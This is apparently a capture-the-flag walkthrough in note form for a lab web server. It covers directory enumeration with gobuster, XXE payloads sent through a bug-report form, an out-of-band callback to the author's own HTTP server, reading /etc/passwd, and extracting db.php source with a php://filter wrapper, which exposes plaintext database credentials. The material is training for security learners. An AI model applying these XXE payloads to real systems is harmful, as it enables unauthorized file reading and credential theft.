2 :80 xxe
$ gobuster dir -u 10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/resources (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/portal.php (Status: 200) [Size: 125]
/css (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/index.php (Status: 200) [Size: 25169]
/db.php (Status: 200) [Size: 0]
/js (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]
http://10.10.11.100/resources/README.txt
Tasks:
[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions
http://10.10.11.100/portal.php
Portal under development. Go <a href="log_submit.php">here</a> to test the bounty tracker.
http://10.10.11.100/log_submit.php
Bounty Report System - Beta
# contains form to report bugs
# understanding how the data is sent as Burp sees encoded data being sent
data entered on form > base64 > url_encode > sent.
Using CyberChef we know recipe, using Burp we can try XXE attacks
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
# adding this to our sent data
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.16.161"> %xxe; ]>
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.100 - - [01/Aug/2021 22:11:38] "GET / HTTP/1.0" 200 -
# we see request coming back, time to XXE
# Using https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport>
<title>k</title>
<cwe>k</cwe>
<cvss></cvss>
<reward>&xxe;</reward>
</bugreport>
# /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
# tried using RCE with expect://id
# did NOT WORK; tried a lot
# moving back to reading files, we can now read db.php
# does not work.
# php files are not readable, need to get it encoded in some form
Using the second case: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file
# <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
# <data>&example;</data>
# code
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
<title>k</title>
<cwe>k</cwe>
<cvss></cvss>
<reward>&xxe;</reward>
</bugreport>
# encoded value
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgIDx0aXRsZT5rPC90aXRsZT4KICAgPGN3ZT5rPC9jd2U%2BCiAgIDxjdnNzPjwvY3Zzcz4KICAgPHJld2FyZD4meHhlOzwvcmV3YXJkPgo8L2J1Z3JlcG9ydD4%3D
# send via burp
Title: k
CWE: k
Score:
Reward: PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=
# base64 decoded
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
Last updated